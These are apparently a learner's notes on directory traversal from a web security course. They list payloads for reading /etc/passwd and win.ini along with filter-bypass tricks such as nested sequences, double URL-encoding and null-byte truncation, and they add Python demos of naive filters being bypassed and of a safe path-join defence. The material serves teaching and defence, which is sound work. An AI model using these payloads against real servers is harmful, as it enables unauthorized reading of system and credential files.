These are notes on the Directory traversal section of the Web Security Academy.
Original: What is directory traversal, and how to prevent it?
Reading arbitrary files
- On Unix-based operating systems:
https://insecure-website.com/loadImage?filename=../../../etc/passwd
- On Windows, both ../ and ..\ are valid directory traversal sequences:
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
Common obstacles to exploiting file path traversal vulnerabilities
- Absolute paths, such as filename=/etc/passwd, which reference a file directly without using any traversal sequence (and so pass a filter that only looks for ../).
- Nested traversal sequences, such as ....// or ....\/, which collapse back into a plain traversal sequence once a filter strips the inner sequence a single time.
- Non-standard encodings, such as ..%c0%af or ..%252f, to get past the input filter.
Double URL-encoding: %252f => %2f => / (the filter sees %2f after the first decode, and only a second decode produces the slash).
%c0%af is an overlong, and therefore invalid, UTF-8 encoding of /; a lax decoder still maps it to a slash.
- If the application requires the user-supplied filename to start with a fixed base directory, such as /var/www/images, the check can be bypassed by placing traversal sequences after the required prefix. For example:
filename=/var/www/images/../../../etc/passwd
- If the application requires the filename to end with a particular extension, such as .png, a null byte placed before the required extension effectively terminates the path (null-byte truncation). This relies on the underlying filesystem call stopping at the first NUL while the extension check runs on the full string:
filename=../../../etc/passwd%00.png
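The following is an added example, not code from the Web Security Academy page: four naive filters of the kind the list above describes, each paired with the payload that gets past it. Paths are resolved lexically with posixpath against an assumed base directory of /var/www/images, so nothing on disk is touched and the result is the same on any host; the NUL-byte truncation of a C-level filesystem call is simulated by cutting the string at the first NUL.

```python
import posixpath
import urllib.parse

# Assumed base directory of the page's loadImage endpoint (an assumption
# made for this example; the page does not state it for these payloads).
BASE_DIRECTORY = "/var/www/images"


def resolve(filename: str) -> str:
    """Resolve filename against BASE_DIRECTORY the way a Unix filesystem
    would, purely lexically: an absolute filename replaces the base, and
    each '..' steps up one directory. posixpath is used so the result is
    the same on every host."""
    return posixpath.normpath(posixpath.join(BASE_DIRECTORY, filename))


def filter_strip_traversal(filename: str) -> str:
    """Naive filter: delete every '../' in a single pass. An absolute path
    contains none, and '....//' collapses to '../' after the pass."""
    return filename.replace("../", "")


def filter_reject_then_decode(raw_query_value: str) -> str:
    """Naive filter: the framework URL-decodes once, the check looks for
    '../', then the application decodes again before opening the file.
    '..%252f' survives the check as '..%2f' and only becomes '../' after
    the second decode."""
    after_framework = urllib.parse.unquote(raw_query_value)   # %252f -> %2f
    if "../" in after_framework:
        raise ValueError("traversal sequence rejected")
    return urllib.parse.unquote(after_framework)              # %2f -> /


def filter_require_base_prefix(filename: str) -> str:
    """Naive filter: require the raw value to start with the base path.
    Traversal sequences after the prefix are never examined."""
    if not filename.startswith(BASE_DIRECTORY):
        raise ValueError("must start with base directory")
    return filename


def filter_require_png(filename: str) -> str:
    """Naive filter: require a .png suffix, then hand the string to a
    C-level filesystem call. Such calls stop at the first NUL byte, which
    is simulated here by cutting the string at '\\x00'."""
    if not filename.endswith(".png"):
        raise ValueError("only .png allowed")
    return filename.split("\x00", 1)[0]


def run_bypasses() -> dict:
    """Feed each naive filter the payload the page lists against it and
    return the path the filesystem would actually open."""
    return {
        "absolute path": resolve(filter_strip_traversal("/etc/passwd")),
        "nested traversal": resolve(
            filter_strip_traversal("....//....//....//etc/passwd")),
        "double URL-encoding": resolve(
            filter_reject_then_decode("..%252f..%252f..%252fetc/passwd")),
        "base-directory prefix": resolve(
            filter_require_base_prefix("/var/www/images/../../../etc/passwd")),
        "null-byte extension": resolve(
            filter_require_png("../../../etc/passwd\x00.png")),
    }


if __name__ == "__main__":
    for name, path in run_bypasses().items():
        print(f"{name:24} -> {path}")
```

Every case ends at /etc/passwd even though each filter "passed" its input, which is the point of the list: a blacklist of sequences is checked against a representation the filesystem never sees.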
How to prevent a directory traversal attack
The most effective way to prevent file path traversal is to avoid passing user-supplied input to filesystem APIs altogether. Where that cannot be avoided, two layers of defense should be used together:
- Validate the input before processing it, for example by allowing only alphanumeric characters.
- After validating the input, append it to the base directory, canonicalize the resulting path, and verify that the canonical path still lies inside the expected base directory.
Below is a simple Java example of verifying the canonical path of a file built from user input:

```java
// Join the input to the base directory, canonicalise the result (this
// collapses ".." and follows symlinks), then check it is still inside the base.
File file = new File(BASE_DIRECTORY, userInput);
if (file.getCanonicalPath().startsWith(BASE_DIRECTORY)) {
    // process file
}
```

One caveat: startsWith compares strings, not path components, so BASE_DIRECTORY must end with a separator (or the comparison must be made against the canonical base plus a separator); otherwise a base of /var/www/images also accepts /var/www/images-private.
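As an added example, not the page's Java, here is the same canonical-path check written in Python with the extra conditions a practitioner wants: NUL bytes rejected up front, the base canonicalized before comparison, and the comparison made on whole path components rather than a string prefix. The demo builds a throwaway directory tree (constructed here, including an images-private sibling and a symlink out of the base) and runs the payloads from the list above through it.

```python
import os
import tempfile


class PathTraversalError(ValueError):
    """Raised when a user-supplied filename resolves outside the base."""


def safe_join(base_directory: str, user_input: str) -> str:
    """Return the canonical path of user_input inside base_directory, or
    raise PathTraversalError.

    Order matters:
    1. Reject NUL bytes first: C-level filesystem calls stop at the first
       NUL, and Python's own path functions refuse embedded NULs anyway.
    2. Canonicalise the base once, so that symlinks such as
       /var/www -> /srv/www are resolved on both sides of the comparison.
    3. Join and canonicalise the candidate. An absolute user_input replaces
       the base during the join and '..' components are collapsed by
       realpath, which is why the check is made on the result, not the input.
    4. Compare whole path components, not a string prefix: a bare
       startswith(base) would accept /var/www/images-private when the base
       is /var/www/images.
    """
    if "\x00" in user_input:
        raise PathTraversalError("NUL byte in filename")
    base = os.path.realpath(base_directory)
    candidate = os.path.realpath(os.path.join(base, user_input))
    if os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError(f"{user_input!r} resolves outside {base}")
    return candidate


def demo() -> dict:
    """Exercise safe_join against the page's payloads inside a throwaway
    directory tree constructed here. Returns {label: outcome} where outcome
    is 'allowed:<path relative to base>' or 'rejected'."""
    outcomes = {}
    with tempfile.TemporaryDirectory() as root:
        images = os.path.join(root, "images")
        private = images + "-private"   # shares the base as a string prefix
        os.mkdir(images)
        os.mkdir(private)
        with open(os.path.join(images, "cat.png"), "w") as f:
            f.write("not really a png")
        with open(os.path.join(private, "secret.txt"), "w") as f:
            f.write("secret")
        cases = [
            ("plain file", "cat.png"),
            ("dot-dot traversal", "../../../etc/passwd"),
            ("absolute path", "/etc/passwd"),
            ("base-directory prefix", images + "/../../../etc/passwd"),
            ("string-prefix sibling", "../images-private/secret.txt"),
            ("null byte before .png", "../../../etc/passwd\x00.png"),
        ]
        # A symlink inside the base that points outside it; realpath follows it.
        try:
            os.symlink(root, os.path.join(images, "up"))
            cases.append(("symlink out of base", "up/images-private/secret.txt"))
        except (OSError, NotImplementedError):
            outcomes["symlink out of base"] = "skipped"
        for label, payload in cases:
            try:
                path = safe_join(images, payload)
                rel = os.path.relpath(path, os.path.realpath(images))
                outcomes[label] = "allowed:" + rel
            except PathTraversalError:
                outcomes[label] = "rejected"
    return outcomes


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:24} {outcome}")
```

The string-prefix sibling case is the one a plain startsWith check gets wrong, and the symlink case shows why canonicalization (realpath here, getCanonicalPath in the Java) rather than lexical normalization is required.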